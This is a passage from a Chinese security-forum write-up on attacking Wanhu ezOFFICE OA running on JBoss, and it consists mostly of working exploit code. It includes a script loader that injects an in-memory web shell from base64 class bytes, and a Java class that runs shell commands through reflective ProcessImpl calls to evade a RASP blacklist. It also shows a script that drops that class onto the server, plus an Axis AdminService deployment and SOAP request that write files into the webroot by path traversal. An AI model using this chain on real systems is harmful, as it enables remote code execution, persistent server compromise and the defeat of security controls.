<span class=hljs-function>function <span class=hljs-title>defineClass</span><span class=hljs-params>(bytes)</span> </span>{
<span class=hljs-keyword>var</span> clz = <span class=hljs-keyword>null</span>;
<span class=hljs-keyword>var</span> version = java.lang.System.getProperty(<span class=hljs-string>"java.version"</span>);
<span class=hljs-keyword>var</span> unsafe = getUnsafe();
// Fresh loader with an empty URL[]: it has no search path of its own, so the only
// class it defines is the one passed in; everything else resolves via its parent.
<span class=hljs-keyword>var</span> classLoader = <span class=hljs-keyword>new</span> java.net.URLClassLoader(
java.lang.reflect.Array.newInstance(
java.lang.Class.forName(<span class=hljs-string>"java.net.URL"</span>),
<span class=hljs-number>0</span>
)
);
<span class=hljs-keyword>try</span> {
<span class=hljs-keyword>if</span> (version.split(<span class=hljs-string>"."</span>)[<span class=hljs-number>0</span>] &amp;gt;= <span class=hljs-number>11</span>) {
// JDK 11+: go through ClassLoader.defineClass(byte[], int, int).
bypassReflectionFilter();
// NOTE(review): assigned without "var", so defineClassMethod leaks into the
// script's global scope; harmless here but easy to trip over when reusing the script.
defineClassMethod = java.lang.Class.forName(
<span class=hljs-string>"java.lang.ClassLoader"</span>
).getDeclaredMethod(
<span class=hljs-string>"defineClass"</span>,
java.lang.Class.forName(<span class=hljs-string>"[B"</span>),
java.lang.Integer.TYPE,
java.lang.Integer.TYPE
);
// Unsafe-backed override flip instead of Method.setAccessible(true).
setAccessible(defineClassMethod);
clz = defineClassMethod.invoke(classLoader, bytes, <span class=hljs-number>0</span>, bytes.length);
} <span class=hljs-keyword>else</span> {
// Pre-11: ProtectionDomain built from a CodeSource with a null location and no
// certificates, null permissions, the fresh loader, and an empty principals list
// (the empty JS array is converted by the engine to an empty Java array).
<span class=hljs-keyword>var</span> protectionDomain = <span class=hljs-keyword>new</span> java.security.ProtectionDomain(
<span class=hljs-keyword>new</span> java.security.CodeSource(
<span class=hljs-keyword>null</span>,
java.lang.reflect.Array.newInstance(
java.lang.Class.forName(<span class=hljs-string>"java.security.cert.Certificate"</span>),
<span class=hljs-number>0</span>
)
),
<span class=hljs-keyword>null</span>,
classLoader,
[]
);
// Null name: the class name is taken from the bytes themselves.
clz = unsafe.defineClass(
<span class=hljs-keyword>null</span>,
bytes,
<span class=hljs-number>0</span>,
bytes.length,
classLoader,
protectionDomain
);
}
} <span class=hljs-keyword>catch</span> (error) {
// Best-effort: print the trace and fall through; clz stays null.
error.printStackTrace();
} <span class=hljs-keyword>finally</span> {
// Returning from finally also discards anything not caught above, so the caller
// only ever sees a Class or null -- it must check for null before using it.
<span class=hljs-keyword>return</span> clz;
}
}
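// Decodes a base64 string into a Java byte[] holding the class file.
// str: base64 text (the payload the loader script embeds).
// sun.misc.BASE64Decoder is tried first because it exists on JDK 6, which has no
// java.util.Base64; where that class is gone (it was removed in JDK 9) the catch
// falls back to java.util.Base64.
// Fix (review): the original fallback did
//     java.lang.Class.forName("java.util.Base64").newInstance().getDecoder()
// but java.util.Base64 has only a private constructor, so newInstance() throws and
// the fallback never decoded anything -- precisely on the JDK 11+ path that
// defineClass() above is written for. getDecoder() is static; call it directly.
function base64DecodeToByte(str) {
    var bt;
    try {
        // JDK 6-8: the legacy sun.misc decoder.
        bt = java.lang.Class.forName("sun.misc.BASE64Decoder").newInstance().decodeBuffer(str);
    } catch (e) {
        // JDK 9+: ClassNotFoundException above lands here; use the standard decoder.
        bt = java.util.Base64.getDecoder().decode(str);
    }
    return bt;
}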
// Entry point of the loader: "code" (assigned earlier in the script, outside this
// excerpt) is expected to hold the base64-encoded class file of the memory shell.
// defineClass() returns null on failure, in which case the newInstance() call below
// fails with a "cannot call method ... of null" style engine error rather than a
// clear message. Note clz is a bare global (no "var").
clz = defineClass(base64DecodeToByte(code));
// Instantiating the class is what runs its constructor / static initialiser, i.e.
// the actual injection step; nothing else is invoked on the instance.
clz.newInstance();
</code></pre>
<p blockindex=33>由于低版本 JBoss 内嵌的是 Tomcat，所以直接使用 Tomcat 内存马即可</p>
<p blockindex=34><img src="data:image/png;base64,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
<p blockindex=35>使用 Listener 组件的内存马容错性更高</p>
<p blockindex=36><img src=data:image/png;base64,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
<p blockindex=37>执行后无报错且返回 200，说明内存马注入成功</p>
<p blockindex=38><img src=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAACVIAAAU0CAYAAAAw9H7+AAAACXBIWXMAAA7EAAAOxAGVKw4bAAAgAElEQVR4nOzde5gU5Z3//c9dVX2Y8wEQRVAHo4lGkgAmamIOIqMxblQEljwaDz8kcX3iAVdcf2seQpDVa13PxlxZEiTRxPxWORn3Z0wcwGjIgglCDETjiUGjCKIzA8yhT1X380dPDwwz010DMwww79d1teB01V3fqq7qKaY/872NtVY9aZBGmubgAscJvm6tHW0dM0KBLe1xBQAAAAAAAPQZ00fj9PTTn74aHwAAABhoPX/iCQDAYWJ/f5AzWL9ZOqbZBHaLMWZTEDj/bUudp6qld3ta3HQXpPqwtXWEF0TmyjHTrbVOvxYMAAAAAACAbvX3z8cIUgEAAOBwMVg/GwYADFL78kMdvllKkowxgQK7MOOk5wwtLt7S5fm9g1RNrckLrHUfk+g8BQAAAAAAMJD2J+gU5mdjBKkAAABwuOCzYQDAoEKQqg+YZmP8SyuLY0/t+dVO3aaamtPXS+4yQlQAAAAAAAAAAAAAAADAQYhQVB+wpZK7LJuV2q2jI1VTa/ICyV3GVH4AAAAAAAAHh/7sSEU3KgAAABxO+DwZADDo9PaHO3yz7JYxJpD8SbnOVMZaqw9bW0e4NvoanagAAAAAAAAOHv0VpCJEBQAAgMMNnw0DAAa1MD/s4ZtlHqbZN6mPDy0u3uJIkhdE5hKiAgAAAAAAOPz1ZYjK7vEAAAAAAAAADk22NJudksxH1o50WjNvM6UfAAAAAADAwaWvO1L1dSeqPbdBlysAAAAMJML9AIBBr9APZ/hmmZcxJgiKvWM90xxcYM3+hagSbW16483Xtb1hh959f7taEylVlZdo+LBqDR82VCd87GPyPK+vagcAAAAAAAAAAAAAAACAPmGtdUxzcIFpakk/E1j71d4OkEwmtXrNi0oGnkaeOEZDi101JKSMLzl+SkEQyDqeMoFVY+NONWx5S0dXx3TaaZ+T67r9sU8AAAAAAACHjf3t8HQgOlIBAAAABwuabAAAsIfufgjEN8uCHGN+YxqbU69Z6cSwKwVBoOd+97wqhx2rIcOqFURLZSXF/aSibqCkU6QW31E6lVYmlVLg+3KCjJKJtDwT6P2t76vYa9OEL3+xH3cNAAAAAADg0NUXgSeCVAAAAOgLufvKg/1eks+GAQDYA0GqfWKk101Da3qXAlsaZoV33n5b//PSaxo7fqxKYhGl/UAmViLX+vKMr5hrlVZUW3el1dKSVCadVtSmVVZRoqZdaZXGjBLpQJ7n6o1XN+jsz4/RsCOO6O/9BAAAAAAAOGT01QdUBKkAAACwv/a+pzyY7yf5bBgAgL3s/Y2bb5aFOabZNDSnQh2ql9a9pA9aijTqqGoNLY0oaV2ZSEyejGTTsoEv15GisZi270rro1YrpduUTqXkGaPKsrjafEeJwCjuSqlUSq9v+VCfO9rRySed3N+7CgAAAAAAcEjor25UfTU2AAAABg+CVAAAHMIIUu0TJ8xCa9e+pB2ZSh115FCVlxdrhy1SJlIiSbLWl6yvdCqlliAiTxl5RoqaQMVFMVVVVqikOKZ0KqN4xNXQiiJF4jF5rqMxJ43W6ncDbdy4sV93EgAAAAAAYDCw4mdiAAAAAAAAwL4qGKSqr6/XR8lyDSkrkmN9JYKIimIRRZSSa9PKpBJyjCTjyFppV3NCHzW2yFhfMkausXKslTGO0um0Usm0op6raFmlWjNS+VHDtW5rRu9v2XIAdhcAAAAAAODwdCACVFaEtQAAAAAAAA6kttZmXXfNt3Tk0HJVl0bDP0p2P44cUq7rrvmW2lqbB3p3DnpevifT6bRer/9AVSNq9Kc3d2jr5nrVfmWMjjyyQulESnHjS9YqnTFK+kaZTEKtqZTefft1nVhztKzKlfCtPGOUcaMqinoyxkoy
sqkWbd64XkecPF5m2HA9t/51fePII+U4nbNdQRDI9/1u6zMychwj40jGhG0m6kjGhGo9amXbfzIYhBy7l6zp9Q8ew+9nTj/VfpCx1sr3fWUygcLts5M914xU+FVwZIyR4zhyjJFMH/+42Jps/dZKNtzYjuPIGLsP58PBIlQzvD304jzuzXVlraykIMjIWhNiO9nj7jhe9j2k0LlgjawC2ZCvq5S7xnt7fMLLnsOH6nkDAAAAAAAAAAAAAIPLv9x0ox77+SP7NUYqkegY4wc/+klflHXYMg3NqR4/4X/q6Wf18fFf1M4dKd35bw/KehX67KcrNOUbF8uJFcv3AynVKieVkG+trONp+7ubdNxxo2VdT+/tyMgN0oo6RkcPjSmhuDKBr+aWpJp3NGnYqGP1YVtK25sTqnCl5vp1Oq92Yqca0qm0Uqlk98UbR5GIIy/iyZjCwQMjSY4rY5zQQSrrZ4M5/fKbltYqkBMqPJMNbZj28E/hIFjHiEGm8/8fpoLAVyKRVCKRUtC+zz3JNlBz5HmejOMWDlIZR65jFI1G5bYf/z5lrYIgUCoTKAiCgueDMY48z5XnmVDn/cEmdy4rxHW4+zz2O/9/3pXCX1dqD7BlUgn5VpItEKQyjlwjedGYXKPC54I1CoKMAhuEK95IjnFkjBsusNcRGgskG+68dF0j4+TN0EqSHrjvbs2dfavmzLtDN9w4K9TYYcZ8dOEC1ddvUk3NaL204W99Mm4YUy46XyuX16mhOXXAtondqkujmjCxVouffHqgS+lW7vz4dd1KnX7GmQNdDgAAQKifWXSn0L8i9vdfs3uPz69oAAAAHP4OpXvAw/2zMADA4HXk0HKlEgn98omlOuMLnw+/4h6fZ6/+wx90ydSLFY3HtfXDnf1Q5eGjxxRGU9NHqjl5vEojRvUfJBT1WnTN1RfJjw3Vjh1J+W0tirhGTrxUbYqpKe1qw5/XqaS8Wtt3pvRRU1IRxyrmOmpxItrc7MoGGTk20LubX9OwEUdLMqqMRVRVFJF1jNLlo2gjBgD9aP26dQOy3dvnztbc2bdKkiZMrFVlVdWA1DFYXXXFpaoujWpzff1Al3LI27jhZVWXRjVr5nU9LrN08eMaPXJ43nE219dr1szrNHrk8I72qlddcanWrF7V4/K3z52ts790Rsfy48d8Qg/cd7caGraHrv/2ubM15aLz8y6zZvWqjnOmujSq0SOHa9bM63o8f/qqtrO/dIZGjxze4zEAAAD752D+wAsAAAAAAAA9SyUSkqQzvvB5VVRUh3+UV3U8zj3v/E5joWc9BqnWvLhepW6g97Y16f0tLTLGamh1TJdP+ZKGlHmyjqttWz/Uts1vaVfjdgW7tstTWs2ZiFpbW9SUSMpv26n33ntHkURSqY/eV6K1Ta+98leNHDlKjmMkG8h1HQ0tjivqeao59lgt/90fDuT+A8CgMnbcuAO+zYaG7brnrjtVWVmluud/r8VPPq0VL6w+4HV0p6Fhu26fOztvKOZgU/fbZ/IGbva2ub5ey5Ys0qTJU3VcTU0/V3f4+9nDCyRJV141o8tzufNpxpWXqampsccx6n77jCZ88XQtXDBfNaNHa8LEWo0dN17LlizS12onaOnix7usM+vGa3XPXXdKyoYRJ0ysVWNjo+bOvlVTL7qgYGBpc329plx0fscYPXngvrv1tdoJWrZkUcd2qqqqtHDBfE344unauOHlPq8NAAD0P0JUAAAAAAAAg5vp65m3DmM9zu8UFA3T+zszKok68lxXOxPV2em1kglFisrkWF+bX3lRQ4YfrXSyVR9+sE2V1UO06W/rNGzYUL3/9puKxeKKxIv0wZZ6xYuLtOHVQBVxoyHDj1ayaYcixpEbiysej2loSVwtqbS2tfoHcv8BAP3s9ddekySddfZEVVcPG+BqOnv9tdd0z113asLE2oEuJbT5P3pIK5fX6Vv/dE2o5X/15BJJ0jcu+WZ/ljUoNDRs19LFT2jsuPE6Zcyn
O3395488ogfuuStvgCrnlVf+qprRo3X7nXd1mkpwzepV+lrtBM248jKNG/+5TsG3sWPH6fvz7uiy3W9Pv1Irl9fpRz94UN+
<p blockindex=39>随便找个路径连接即可</p>
<h3 blockindex=40>RASP绕过</h3>
<p blockindex=41>在命令执行的时候可能会遇到:<strong>java.lang.SecurityException: cmd execute denied !!!</strong></p>
<p blockindex=42><img src=data:image/png;base64,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
<p blockindex=43>即目标部署了 RASP，而 RASP 一般是通过黑名单进行拦截的</p>
<p blockindex=44>这里拦截的是 ProcessBuilder，于是尝试更底层的命令执行入口 java.lang.ProcessImpl；该类不是 public 的，所以只能通过反射调用</p>
<p blockindex=45><img src="data:image/png;base64,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
<p blockindex=46>这里 JDK 1.6 和 JDK 1.8 中 ProcessImpl.start 等方法的签名存在差异（下面的代码用的是四参数版本），所以需要按目标 JDK 版本小小修改一下</p>
<p blockindex=47>当调用setAccessible的时候会报错</p>
<pre blockindex=48><code class="hljs language-php">sun.org.mozilla.javascript.internal.EcmaError: <span class=hljs-built_in>TypeError</span>: Cannot call method <span class=hljs-string>"setAccessible"</span> of <span class=hljs-literal>null</span>
</code></pre>
<p blockindex=49><img src="data:image/png;base64,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
<p blockindex=50>这个报错说明在脚本里取到的 Method 对象为 null，无法这样直接反射调用。参考网上的文章，可以先把编译好的 class 文件写到磁盘，再用 URLClassLoader 去加载</p>
<pre blockindex=51><code class="hljs language-java"><span class=hljs-keyword>import</span> java.io.ByteArrayOutputStream;
<span class=hljs-keyword>import</span> java.io.InputStream;
<span class=hljs-keyword>import</span> java.lang.reflect.Method;
<span class=hljs-keyword>import</span> java.util.Map;
/**
 * Runs a shell command by calling java.lang.ProcessImpl.start reflectively,
 * bypassing Runtime.exec / ProcessBuilder.start, which is where the RASP in
 * this article hooks. The command's output is captured into result and
 * handed back through toString(); the class is driven purely by its
 * constructor from the loader script (main is empty).
 *
 * NOTE(review): the four-argument start(String[], Map, String, boolean)
 * signature is the one this listing targets; the article says the signature
 * differs between JDK 1.6 and 1.8, so getDeclaredMethod will presumably throw
 * NoSuchMethodException on the other version -- adjust per target JDK.
 * NOTE(review, defensive): a RASP that only blocks ProcessBuilder/Runtime
 * misses this path; to cover it the hook has to sit on ProcessImpl.start
 * itself or on the native layer beneath it.
 * The logical-and and the greater-than below are shown HTML-escaped in this
 * capture; they are the plain Java operators.
 */
<span class=hljs-keyword>public</span> <span class=hljs-class><span class=hljs-keyword>class</span> <span class=hljs-title>Testcmd</span> </span>{
// Captured process output (stdout, plus stderr if the boolean below means redirect).
String result = <span class=hljs-string>""</span>;
// paramString: the command line, handed to bash -c or cmd.exe /c as one argument.
<span class=hljs-function><span class=hljs-keyword>public</span> <span class=hljs-title>Testcmd</span><span class=hljs-params>(String paramString)</span> <span class=hljs-keyword>throws</span> Exception</span>{
<span class=hljs-keyword>boolean</span> isLinux = <span class=hljs-keyword>true</span>;
String osTyp = System.getProperty(<span class=hljs-string>"os.name"</span>);
// Anything whose os.name contains "win" is treated as Windows; everything else as Linux.
<span class=hljs-keyword>if</span> (osTyp != <span class=hljs-keyword>null</span> &amp;amp;&amp;amp; osTyp.toLowerCase().contains(<span class=hljs-string>"win"</span>)) {
isLinux = <span class=hljs-keyword>false</span>;
}
String[] cmds = isLinux ? <span class=hljs-keyword>new</span> String[]{<span class=hljs-string>"bash"</span>, <span class=hljs-string>"-c"</span>, paramString} : <span class=hljs-keyword>new</span> String[]{<span class=hljs-string>"cmd.exe"</span>, <span class=hljs-string>"/c"</span>, paramString};
// ProcessImpl is not public, hence Class.forName plus getDeclaredMethod.
Class clazz = Class.forName(<span class=hljs-string>"java.lang.ProcessImpl"</span>);
Method method = clazz.getDeclaredMethod(<span class=hljs-string>"start"</span>, String[].class, Map.class,String.class,<span class=hljs-keyword>boolean</span>.class);
// Plain setAccessible works here because this is a compiled class, not engine script.
method.setAccessible(<span class=hljs-keyword>true</span>);
// Static method: null receiver; null environment and null working directory inherit
// the JVM's; the trailing true is presumably redirectErrorStream.
InputStream ins = ((Process) method.invoke(<span class=hljs-keyword>null</span>,cmds,<span class=hljs-keyword>null</span>,<span class=hljs-keyword>null</span>,<span class=hljs-keyword>true</span>)).getInputStream();
ByteArrayOutputStream bos = <span class=hljs-keyword>new</span> ByteArrayOutputStream();
<span class=hljs-keyword>byte</span>[] bytes = <span class=hljs-keyword>new</span> <span class=hljs-keyword>byte</span>[<span class=hljs-number>1024</span>];
<span class=hljs-keyword>int</span> size;
// Drain the stream until EOF (read returns -1); a zero-length read also ends the loop.
<span class=hljs-keyword>while</span>((size = ins.read(bytes)) &amp;gt; <span class=hljs-number>0</span>)
bos.write(bytes,<span class=hljs-number>0</span>,size);
// NOTE(review): not in a finally, so an IOException leaves the stream open.
ins.close();
// Decoded with the platform default charset.
<span class=hljs-keyword>this</span>.result = bos.toString();
}
// Returns the captured output so the caller can simply print the instance.
<span class=hljs-keyword>public</span> java.lang.<span class=hljs-function>String <span class=hljs-title>toString</span><span class=hljs-params>()</span> </span>{
<span class=hljs-keyword>return</span> <span class=hljs-keyword>this</span>.result;
}
// Deliberately empty: only present so the class compiles/launches as a normal program.
<span class=hljs-function><span class=hljs-keyword>public</span> <span class=hljs-keyword>static</span> <span class=hljs-keyword>void</span> <span class=hljs-title>main</span><span class=hljs-params>(String[] args)</span> </span>{
}
}
</code></pre>
<p blockindex=52>RASP 没有拦截 File 类，因此可以把 class 文件直接写入到目标文件系统中</p>
<pre blockindex=53><code class="hljs language-java">// Stage 1 of the RASP bypass: drop the compiled Testcmd class (listed above) onto
// the server's disk so a later stage can load it with URLClassLoader.
// NOTE(review): this is engine script (Nashorn/Rhino), not Java as the listing's
// language tag claims. The resource name below looks misspelled -- Nashorn ships
// "nashorn:mozilla_compat.js". If the load fails the empty catch hides it, and
// importPackage() then only exists when the engine already provides it (Rhino on
// older JDKs, cf. the sun.org.mozilla error shown earlier). Confirm on the target.
<span class=hljs-keyword>try</span> {
load(<span class=hljs-string>"nashorn:Moziilla_compat.js"</span>);
} <span class=hljs-keyword>catch</span> (e) {
}
// Brings File, FileOutputStream and BASE64Decoder into scope as bare names.
// The sun.misc decoder implies a JDK 8 or older target.
importPackage(Packages.java.io);
importPackage(Packages.java.lang);
importPackage(Packages.sun.misc);
// Relative path: resolved against the JVM's working directory, presumably the
// directory next to server/ on this JBoss layout (the later request uses
// ../server/oa/deploy/... the same way) -- verify before use.
<span class=hljs-keyword>var</span> file = <span class=hljs-keyword>new</span> File(<span class=hljs-string>"../server/Testcmd.class"</span>);
<span class=hljs-keyword>var</span> fos = <span class=hljs-keyword>new</span> FileOutputStream(file);
<span class=hljs-keyword>var</span> base64Decoder = <span class=hljs-keyword>new</span> BASE64Decoder();
// The base64 literal is the Testcmd class file; it is elided in this copy.
<span class=hljs-keyword>var</span> decodeContent = base64Decoder.decodeBuffer(<span class=hljs-string>"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"</span>);
// Explicit Integer boxing presumably steers the engine to the write(byte[], int, int) overload.
fos.write(decodeContent, <span class=hljs-keyword>new</span> Integer(<span class=hljs-number>0</span>), <span class=hljs-keyword>new</span> Integer(decodeContent.length));
// NOTE(review): not in a finally -- an exception from write() leaves the handle open.
fos.close();
</code></pre>
<p blockindex=54>最后就是网上公开的poc了</p>
<p blockindex=55><img src=data:image/png;base64,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
<h3 blockindex=56>StringUtil任意文件写</h3>
<p blockindex=57>网上还存在一种方法:使用<code>com.whir.ezoffice.ezform.util.StringUtil</code>这个类写文件</p>
<p blockindex=58><img src=data:image/png;base64,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
<p blockindex=59>该类存在无参构造方法，满足被 Axis 注册为 service 的条件</p>
<pre blockindex=60><code class="hljs language-java">/**
 * Appends content to fileName, creating any missing parent directories first.
 * Decompiled from com.whir.ezoffice.ezform.util.StringUtil (see the article).
 *
 * Security notes (review):
 *  - fileName is used verbatim: no canonicalisation and no base-directory check,
 *    so "../" segments and absolute paths are honoured (the request below writes
 *    to ../server/oa/deploy/defaultroot.war/1.txt).
 *  - dir.mkdirs() lets the caller create arbitrary directory trees as well.
 *  - FileOutputStream(fileName, true) opens in append mode, so existing files
 *    are extended, not replaced.
 *  - Only "/" is treated as a separator; a name with no "/" yields dirPath "",
 *    and new File("").mkdirs() appears to fail, so such names throw the
 *    "create directory" IOException -- confirm on the target JVM.
 *  - content is encoded with the platform default charset (OutputStreamWriter
 *    without a charset argument).
 *  - The two close() calls in finally are not individually guarded, so an
 *    exception from writer.close() skips outStream.close().
 * Once this class is exposed as an Axis RPC service with allowedMethods "*"
 * (the AdminService deployment further down), printToFile becomes a remote
 * arbitrary file write. A defensive fix would resolve fileName against a fixed
 * base directory and reject anything that escapes it.
 */
<span class=hljs-function><span class=hljs-keyword>private</span> <span class=hljs-keyword>static</span> <span class=hljs-keyword>void</span> <span class=hljs-title>writeToFile</span><span class=hljs-params>(String fileName, String content)</span> <span class=hljs-keyword>throws</span> IOException </span>{
BufferedOutputStream outStream = <span class=hljs-keyword>null</span>;
OutputStreamWriter writer = <span class=hljs-keyword>null</span>;
<span class=hljs-keyword>try</span> {
String dirPath = <span class=hljs-string>""</span>;
// Parent directory is everything before the last "/" (backslashes are not considered).
<span class=hljs-keyword>if</span> (fileName.lastIndexOf(<span class=hljs-string>"/"</span>) != -<span class=hljs-number>1</span>) {
dirPath = fileName.substring(<span class=hljs-number>0</span>, fileName.lastIndexOf(<span class=hljs-string>"/"</span>));
}
File dir = <span class=hljs-keyword>new</span> File(dirPath);
// Creates the whole missing chain; the operator below is shown HTML-escaped in this capture.
<span class=hljs-keyword>if</span> (!dir.exists() &amp;amp;&amp;amp; !dir.mkdirs()) {
<span class=hljs-keyword>throw</span> <span class=hljs-keyword>new</span> IOException(<span class=hljs-string>"create directory '"</span> + dirPath + <span class=hljs-string>"' failed!"</span>);
}
// Append mode.
outStream = <span class=hljs-keyword>new</span> BufferedOutputStream(<span class=hljs-keyword>new</span> FileOutputStream(fileName, <span class=hljs-keyword>true</span>));
writer = <span class=hljs-keyword>new</span> OutputStreamWriter(outStream);
writer.write(content);
} <span class=hljs-keyword>catch</span> (IOException var9) {
<span class=hljs-keyword>throw</span> var9;
} <span class=hljs-keyword>finally</span> {
// Closing the writer flushes the buffered bytes to disk.
<span class=hljs-keyword>if</span> (writer != <span class=hljs-keyword>null</span>) {
writer.close();
}
<span class=hljs-keyword>if</span> (outStream != <span class=hljs-keyword>null</span>) {
outStream.close();
}
}
}
// Public entry point: appends content to fileName as-is (no newline), with every
// caveat of writeToFile. This is the method the freemarkerQa SOAP request calls.
<span class=hljs-function><span class=hljs-keyword>public</span> <span class=hljs-keyword>static</span> <span class=hljs-keyword>void</span> <span class=hljs-title>printToFile</span><span class=hljs-params>(String fileName, String content)</span> <span class=hljs-keyword>throws</span> IOException </span>{
writeToFile(fileName, content);
}
// Same as printToFile but appends a trailing "\n"; equally exposed once the class
// is registered as a service with allowedMethods "*".
<span class=hljs-function><span class=hljs-keyword>public</span> <span class=hljs-keyword>static</span> <span class=hljs-keyword>void</span> <span class=hljs-title>printlnToFile</span><span class=hljs-params>(String fileName, String content)</span> <span class=hljs-keyword>throws</span> IOException </span>{
writeToFile(fileName, content + <span class=hljs-string>"\n"</span>);
}
</code></pre>
<p blockindex=61>可以通过 printToFile 方法任意文件写：内容以及文件名均可控，fileName 未做任何路径校验，会自动创建缺失的目录并以追加方式写入</p>
<pre blockindex=62><code class="hljs language-php">http:<span class=hljs-comment>//127.0.0.1:{{port}}/defaultroot/services/./AdminService?method=!--%3E%3Cdeployment%20xmlns=%22http://xml.apache.org/axis/wsdd/%22%20xmlns:java=%22http://xml.apache.org/axis/wsdd/providers/java%22%3E%3Cservice%20name=%22freemarkerQa%22%20provider=%22java:RPC%22%3E%3Cparameter%20name=%22className%22%20value=%22com.whir.ezoffice.ezform.util.StringUtil%22/%3E%3Cparameter%20name=%22allowedMethods%22%20value=%22*%22/%3E%3C/service%3E%3C/deployment</span>
</code></pre>
<p blockindex=63>网上众多的 freemarkerQa 服务均是调用的该类。另外注意请求路径里的 <code>/./</code> 片段（上面的 AdminService 请求也是如此），推测是为了绕过基于 URL 前缀的访问控制，文中未作说明，需自行验证</p>
<pre blockindex=64><code class="hljs language-php">POST /defaultroot/./services/freemarkerQa HTTP/<span class=hljs-number>1.1</span>
Host:
User-Agent: Moziilla/<span class=hljs-number>5.0</span> (Linux; U; Android <span class=hljs-number>2.3</span>.<span class=hljs-number>6</span>; en-us; Nexus S Build/GRK39F) AppleWebKit/<span class=hljs-number>533.1</span> (KHTML, like Gecko) Version/<span class=hljs-number>4.0</span> Mobile Safari/<span class=hljs-number>533.1</span>
SOAPAction:
Content-Type: text/xml;charset=UTF-<span class=hljs-number>8</span>
Content-Length: <span class=hljs-number>606</span>
&lt;soapenv:Envelope xmlns:xsi=<span class=hljs-string>"http://www.w3.org/2001/XMLSchema-instance"</span> xmlns:xsd=<span class=hljs-string>"http://www.w3.org/2001/XMLSchema"</span> xmlns:soapenv=<span class=hljs-string>"http://schemas.xmlsoap.org/soap/envelope/"</span> xmlns:util=<span class=hljs-string>"http://util.ezform.ezoffice.whir.com"</span>&gt;
&lt;soapenv:Body&gt;
&lt;util:printToFile soapenv:encodingStyle=<span class=hljs-string>"http://schemas.xmlsoap.org/soap/encoding/"</span>&gt;
&lt;fileName xsi:type=<span class=hljs-string>"soapenc:string"</span> xmlns:soapenc=<span class=hljs-string>"http://schemas.xmlsoap.org/soap/encoding/"</span>&gt;../server/oa/deploy/defaultroot.war/<span class=hljs-number>1</span>.txt&lt;/fileName&gt;
&lt;content xsi:type=<span class=hljs-string>"soapenc:string"</span>&gt;x&lt;/content&gt;
&lt;/util:printToFile&gt;
&lt;/soapenv:Body&gt;
&lt;/soapenv:Envelope&gt;
</code></pre>
<p blockindex=65><img src=data:image/png;base64,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
<p blockindex=66>验证成功</p>
<h2 blockindex=67>总结</h2>
<p blockindex=68>实战中很有意思的一个漏洞但网上的poc。。。呃呃</p>
<p blockindex=69>还可以尝试利用 freemarker、bsh 等其他类进行攻击</p>
<p blockindex=70>万户作为老牌oa还是很值得去学习研究的</p>
<p blockindex=71>参考:<br>
<a href=https://mp.weixin.qq.com/s/sktnBnCrZUoqkhGM0O9HRQ>万户rce</a><br>
<a href=https://mp.weixin.qq.com/s/4FyX_zmY90yGLzdJgUGzcg>实战 | 万户GeneralWeb组合Bypass Rasp</a></p></div></div>
</div>
<div class="post-opt mt-30">
<ul class="list-inline text-muted">
<li>
<i class="fa fa-clock-o"></i>
发表于 2024-09-29 10:00:01
</li>
<li>阅读 ( 133 )</li>
<li>分类:<a href=https://forum.butian.net/community/Pen_Testing target=_blank rel="noopener noreferrer">渗透测试</a>
</li>
</ul>
</div>
</div>